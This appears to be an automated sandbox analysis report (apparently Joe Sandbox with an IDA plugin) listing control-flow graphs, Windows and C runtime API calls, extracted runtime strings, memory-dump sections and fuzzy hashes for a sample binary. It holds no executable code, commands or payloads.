                            • Instruction Fuzzy Hash: FE212755B16B8580FE58B764A6113F892819F487A0FCD4A34DE3C8B3C9DF3CA050C321

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 510 7ff75f9490f0-7ff75f949153 call 7ff75f94e5e0 call 7ff75f8d8830 515 7ff75f949159-7ff75f94916b _wstat64 510->515 516 7ff75f949270-7ff75f94927a call 7ff75f8d7870 510->516 517 7ff75f949238-7ff75f949248 _errno call 7ff75f97abd0 515->517 518 7ff75f949171-7ff75f949188 515->518 516->515 528 7ff75f949280-7ff75f94929e call 7ff75f8d74f0 516->528 529 7ff75f94924e-7ff75f949251 517->529 530 7ff75f9493a0-7ff75f9493a5 517->530 521 7ff75f9491b9-7ff75f9491c1 call 7ff75f97abc0 518->521 522 7ff75f94918a-7ff75f94918f 518->522 533 7ff75f9491c6-7ff75f9491e7 521->533 525 7ff75f949195-7ff75f94919a 522->525 526 7ff75f9493b0-7ff75f9493b6 522->526 531 7ff75f9493c0-7ff75f9493c6 525->531 532 7ff75f9491a0-7ff75f9491a5 525->532 526->521 542 7ff75f9492a4-7ff75f9492bf 528->542 543 7ff75f9493e0-7ff75f9493f3 528->543 529->530 536 7ff75f949257-7ff75f94926a 529->536 530->526 531->521 537 7ff75f9491ab-7ff75f9491b4 532->537 538 7ff75f9493d0-7ff75f9493d6 532->538 539 7ff75f9491e9-7ff75f9491ec call 7ff75f8d94f0 533->539 540 7ff75f9491f1-7ff75f9491f9 533->540 536->533 537->521 538->521 539->540 544 7ff75f9491fb-7ff75f949205 call 7ff75f997220 540->544 545 7ff75f94920a-7ff75f949216 540->545 546 7ff75f9492c5-7ff75f9492e4 542->546 547 7ff75f949430-7ff75f949433 542->547 551 7ff75f9493f5-7ff75f949403 543->551 552 7ff75f949420-7ff75f949428 543->552 544->545 549 7ff75f94921c-7ff75f949230 545->549 550 7ff75f9494f2 call 7ff75f8c0a50 545->550 553 7ff75f949408-7ff75f949418 546->553 554 7ff75f9492ea-7ff75f949332 546->554 556 7ff75f949435-7ff75f949439 547->556 557 7ff75f949480-7ff75f94948b 547->557 560 7ff75f9494f7-7ff75f949521 550->560 551->553 552->547 553->552 558 7ff75f949344-7ff75f949368 call 7ff75f94d180 554->558 559 7ff75f949334-7ff75f94933c call 7ff75f8d94f0 554->559 561 7ff75f9494e4-7ff75f9494f0 556->561 562 7ff75f94943f-7ff75f949446 556->562 563 7ff75f949495-7ff75f9494c6 557->563 573 7ff75f949377-7ff75f949382 558->573 574 7ff75f94936a-7ff75f949372 call 7ff75f8d94f0 558->574 559->558 560->557 561->557 562->563 566 7ff75f949448-7ff75f94944a 562->566 567 7ff75f949467-7ff75f94947c 563->567 568 7ff75f9494c8-7ff75f9494cb 563->568 566->560 571 7ff75f949450-7ff75f949452 566->571 567->557 572 7ff75f9494cd-7ff75f9494dd 568->572 571->557 575 7ff75f949454-7ff75f949461 571->575 572->572 577 7ff75f9494df 572->577 579 7ff75f949384-7ff75f949391 call 7ff75f997220 573->579 580 7ff75f949396-7ff75f94939b 573->580 574->573 575->567 576 7ff75f949526-7ff75f949548 575->576 576->557 577->567 579->580 580->515
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: _wstat64
                            • String ID:
                            • API String ID: 969268460-0
                            • Opcode ID: aa471045af863ddf46173c7f8a063773cfadfad5ac4e3db11b43ebc3625e4d70
                            • Instruction ID: bdf95a488d6c311bc50c0a94d9c2139e53167548924be1c86653470ecc43748e
                            • Opcode Fuzzy Hash: aa471045af863ddf46173c7f8a063773cfadfad5ac4e3db11b43ebc3625e4d70
                            • Instruction Fuzzy Hash: 17A16322A08FC281EB74AB15E4443FAA3A2FB95784F988132DA9D8779DDF3CD444C711

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 595 7ff75f958f90-7ff75f958fb1 call 7ff75f958d30 598 7ff75f958fc0-7ff75f958fd3 _write 595->598 599 7ff75f958fb8-7ff75f958fbb 598->599 600 7ff75f958fd5-7ff75f958fdb _errno 598->600 601 7ff75f958fbd 599->601 602 7ff75f958fe0-7ff75f958fed 599->602 600->598 603 7ff75f958fdd 600->603 601->598 603->602
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: _errno_write
                            • String ID:
                            • API String ID: 3328065147-0
                            • Opcode ID: 0722ed42b16776d322e148a2577bebc649d8b0cf3e471dc7acd448d21c9ee544
                            • Instruction ID: fbf0739cf4f949006ac46d267de8b6329e96c4493ace0e253b21b73ef73331c1
                            • Opcode Fuzzy Hash: 0722ed42b16776d322e148a2577bebc649d8b0cf3e471dc7acd448d21c9ee544
                            • Instruction Fuzzy Hash: 77F0A762F2999254F9653A273D484F6D1421F9DBE1EEC4530ED1CCB7C99E2CE8828360

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: _errno_wmkdir
                            • String ID:
                            • API String ID: 1395797427-0
                            • Opcode ID: b3ebaf47002cb53b71cf7cd388377f7b71bb69677ebe8acefb996eb32ef534bf
                            • Instruction ID: 27796c3f1bd79bc93b1bbbd831ed1e2d37669bef05208a1248327becf5d240db
                            • Opcode Fuzzy Hash: b3ebaf47002cb53b71cf7cd388377f7b71bb69677ebe8acefb996eb32ef534bf
                            • Instruction Fuzzy Hash: 8AF06262B08D8245F7E03B65E8447F9A3919F54B84F9C8031D90DCB359DF2CB8919361

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 608 7ff75f960ea0-7ff75f960ec8 call 7ff75f8dc800 611 7ff75f960ece-7ff75f960ed6 call 7ff75f960690 608->611 612 7ff75f960f58-7ff75f960f5a 608->612 617 7ff75f960edb-7ff75f960f36 call 7ff75f9609a0 call 7ff75f958ed0 611->617 613 7ff75f960f3d-7ff75f960f45 612->613 615 7ff75f960f47-7ff75f960f52 613->615 616 7ff75f960f76-7ff75f960f95 call 7ff75f8c0a50 call 7ff75f9975a0 call 7ff75f9970f0 613->616 629 7ff75f960f97-7ff75f960ff2 call 7ff75f8bfcf0 call 7ff75f997970 call 7ff75f8e2ac0 call 7ff75f8dc800 616->629 617->612 627 7ff75f960f38-7ff75f960f3b 617->627 627->612 627->613 638 7ff75f960ff4-7ff75f960ff8 629->638 639 7ff75f961050-7ff75f96105f 629->639 642 7ff75f960ffa-7ff75f961004 638->642 643 7ff75f961070-7ff75f961074 638->643 640 7ff75f9611ce call 7ff75f8c0a50 639->640 641 7ff75f961065-7ff75f96106d 639->641 648 7ff75f9611d3-7ff75f9611fb call 7ff75f998040 call 7ff75f8dc800 640->648 644 7ff75f96100a-7ff75f961013 642->644 645 7ff75f9611c4-7ff75f9611cc 642->645 643->639 646 7ff75f961076 643->646 651 7ff75f961019-7ff75f96101d 644->651 652 7ff75f961096-7ff75f961098 644->652 645->640 645->648 646->642 661 7ff75f96120d-7ff75f961217 648->661 662 7ff75f9611fd-7ff75f961203 648->662 654 7ff75f961080-7ff75f961084 651->654 655 7ff75f96101f-7ff75f961029 651->655 652->639 654->639 657 7ff75f961086-7ff75f961090 call 7ff75f960690 654->657 655->645 658 7ff75f96102f-7ff75f961037 655->658 657->652 668 7ff75f961180-7ff75f9611a2 657->668 669 7ff75f961039-7ff75f96103c 658->669 670 7ff75f9610a0-7ff75f9610e8 658->670 665 7ff75f961205 662->665 666 7ff75f961220-7ff75f961223 662->666 665->661 666->661 667 7ff75f961225-7ff75f961228 666->667 667->661 671 7ff75f96122a-7ff75f96123c 667->671 668->639 669->652 672 7ff75f96103e-7ff75f961049 669->672 674 7ff75f9610ee-7ff75f96113c 670->674 675 7ff75f9611b0-7ff75f9611bf memcpy 670->675 677 7ff75f961148-7ff75f96116c 672->677 678 7ff75f96104f 672->678 674->639 675->674 677->639 680 7ff75f961172-7ff75f961174 677->680 678->639 680->639
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bf7fe9475661202f59f9329a6d9ae8e9eb21126316b82ffe668b83d55dfba970
                            • Instruction ID: 256a1547fd797c3034b85f27655a0428c17fa433981509ec5318c130eee7cb0e
                            • Opcode Fuzzy Hash: bf7fe9475661202f59f9329a6d9ae8e9eb21126316b82ffe668b83d55dfba970
                            • Instruction Fuzzy Hash: 7C917F22A18FC585EF61AF39D5403EDA360EB59F98F884235DE4C973A9DF28E485C350
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: strlen
                            • String ID:
                            • API String ID: 39653677-0
                            • Opcode ID: e0d6c23f35871a76e10bfc20fda53440a60b0e83b9a9d2f759ed260345d8a448
                            • Instruction ID: 078ccc9f79d65856d3e684a96f79e70cd48bb96baf16c8c4f00697220bb58a79
                            • Opcode Fuzzy Hash: e0d6c23f35871a76e10bfc20fda53440a60b0e83b9a9d2f759ed260345d8a448
                            • Instruction Fuzzy Hash: C8E092A2F5A65941FC49F31B79960E852156F89FD8A8D8430DE0C4FB5ADE2DD8934340
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: CreateEventSleep
                            • String ID:
                            • API String ID: 3100162736-0
                            • Opcode ID: 77bdf4cf5fff6ca6c48dd6c238851755aee8bebf27c9e3655bbdc20e9207426b
                            • Instruction ID: 6354f0e9c1e9bfd14b81bbef7b3fa78503a4a398a8a3000dfe14ff14cb2bf552
                            • Opcode Fuzzy Hash: 77bdf4cf5fff6ca6c48dd6c238851755aee8bebf27c9e3655bbdc20e9207426b
                            • Instruction Fuzzy Hash: CE124F22A09B8281FB54BF25A8053F9A354AF45B64F9C4231DA2D8E6D5DF3CF491E370
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: File$Volume_errno$FindInformationcallocfree$CloseDiskErrorFirstFreeHandleLastPointerSizeSpaceType_lseeki64
                            • String ID:
                            • API String ID: 2216966719-0
                            • Opcode ID: 7b4704b6215eda3fbabad6741b8a690ac475d18575dfad86c8848813b999d4c8
                            • Instruction ID: 6e400036c793947fe6b559a2c7ec364a02b0fbdaad5720ae1344165bb5bbbaa9
                            • Opcode Fuzzy Hash: 7b4704b6215eda3fbabad6741b8a690ac475d18575dfad86c8848813b999d4c8
                            • Instruction Fuzzy Hash: 7151A421A2C78242F6507F25A4143BAA290EF41BE0FD80231EA6D8F7D5DF3CF4959B20
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: strlen$strcmp
                            • String ID: *$basic_string::append$cannot create shim for unknown locale::facet
                            • API String ID: 551667898-2910022950
                            • Opcode ID: 39f785a038af8ea2b5edaf222184e2212c0a3b6d2275a16199ca644727cafcb2
                            • Instruction ID: 6f359a18295190208d974f9e831b4f5e4129a8706d62e4a9bfe649bd2e677673
                            • Opcode Fuzzy Hash: 39f785a038af8ea2b5edaf222184e2212c0a3b6d2275a16199ca644727cafcb2
                            • Instruction Fuzzy Hash: 3282A772A09F8582E710AF15E4543AEB7A0FB44B84F888139CB8D4B795DF3DE465D3A0
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: strlen
                            • String ID: $!$inity
                            • API String ID: 39653677-2254741344
                            • Opcode ID: e98eb23fadee796f205fd82b99a0aa54f1fffd09365f3312f97d717618aef51f
                            • Instruction ID: 0977ae30c4401e0e1b945048ec86629fc21fdf07b129cc924746d20952b3df55
                            • Opcode Fuzzy Hash: e98eb23fadee796f205fd82b99a0aa54f1fffd09365f3312f97d717618aef51f
                            • Instruction Fuzzy Hash: CFF2A032A0C7C68AE760AF25A4407EAF7A1FB84740F984135DA894FB89DF7CF4559B10
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: memcpy
                            • String ID: basic_string: construction from null is not valid$basic_string::append
                            • API String ID: 3510742995-51681568
                            • Opcode ID: 22bccc7950be02a72d61b7d6d8a4952ed2875b4e045c5c25a078b7a8426361f8
                            • Instruction ID: cf833e9c3ff362194129c87c87d237afb2bd81e9d3104ff702f60b382f8e252f
                            • Opcode Fuzzy Hash: 22bccc7950be02a72d61b7d6d8a4952ed2875b4e045c5c25a078b7a8426361f8
                            • Instruction Fuzzy Hash: 78E25F72A09FC680EA71AB15E4543EAE3A0FB98B84F884131DA9D87B9DDF3CD445C750
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: strlenstrncmp
                            • String ID: Z$Z$_$_$_$_GLOBAL_
                            • API String ID: 1310274236-662103887
                            • Opcode ID: fb1dea34fda34d883f7d5c5d79716cf747850302a99be72d2fdf765eaa6495c0
                            • Instruction ID: be3319afe25b23c03fe45bed63b632484df05e3193363194b0445a69182f4177
                            • Opcode Fuzzy Hash: fb1dea34fda34d883f7d5c5d79716cf747850302a99be72d2fdf765eaa6495c0
                            • Instruction Fuzzy Hash: BEF1C073A08AC299F720AF3588143FD7BA1BB05748F884531DA5D1F799CF3CAA51A750
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: AddressProc$HandleLibraryLoadModule
                            • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                            • API String ID: 384173800-4041758303
                            • Opcode ID: 6195be83927704eff86e8c853455652f2418f3b9a4730fb1f25dfa61422512a8
                            • Instruction ID: b94e91c8c71c2fa135341e18a6c389bd9c2a7beb356721bc69a0f9499981ce6f
                            • Opcode Fuzzy Hash: 6195be83927704eff86e8c853455652f2418f3b9a4730fb1f25dfa61422512a8
                            • Instruction Fuzzy Hash: 50F0F964A1AE8781FE45BB55F8540F8A3A4AF44780BC80132C88D8B37CDF2DA4559320
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: localeconv
                            • String ID:
                            • API String ID: 3737801528-0
                            • Opcode ID: f3301fd0b74d026327ac4eb281251bbda2a2c12871cbbdeccba1631332ece7c1
                            • Instruction ID: eb92ae9a93e489fdd25586593ed87ef8f4e0ce528d0bc85aa282485a713fc24d
                            • Opcode Fuzzy Hash: f3301fd0b74d026327ac4eb281251bbda2a2c12871cbbdeccba1631332ece7c1
                            • Instruction Fuzzy Hash: FB52DF72A483D28AEB64AE2494447FFBA91EB45744FCC4131DA494FAC5DF3CF960A720
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: m$std::bad_exception$uninitialized __any_string$uninitialized __any_string
                            • API String ID: 0-4007098236
                            • Opcode ID: 8e7bc0dc7780918473bce696930b7bb20cb3417e893949cdd3cff117d4b9dcf0
                            • Instruction ID: 62e40500d2dfaa832521c65b3dfb1a10a159291748d46ed6ffc21448e5d0b9af
                            • Opcode Fuzzy Hash: 8e7bc0dc7780918473bce696930b7bb20cb3417e893949cdd3cff117d4b9dcf0
                            • Instruction Fuzzy Hash: 67E21836609BC485D7A09B26F4407EAB7A4FB89B94F948126EECC87B58DF3CD055CB10
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: freembstowcs$DebuggerExceptionPresentRaisemalloc
                            • String ID:
                            • API String ID: 3725749409-0
                            • Opcode ID: 7d3dfe65fe42c0d6652a96e233f5ca0822635b6884d9a4897ee2127c397daaf6
                            • Instruction ID: 2f837fe27095cef1d5fdcb3417d9b29328afa809fea3e00ce9343a3378c7f662
                            • Opcode Fuzzy Hash: 7d3dfe65fe42c0d6652a96e233f5ca0822635b6884d9a4897ee2127c397daaf6
                            • Instruction Fuzzy Hash: 06419022A0878281FA64BF26A4053F9E290AF44798F8C8235EE5E5F7D5DF3CF4509720
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
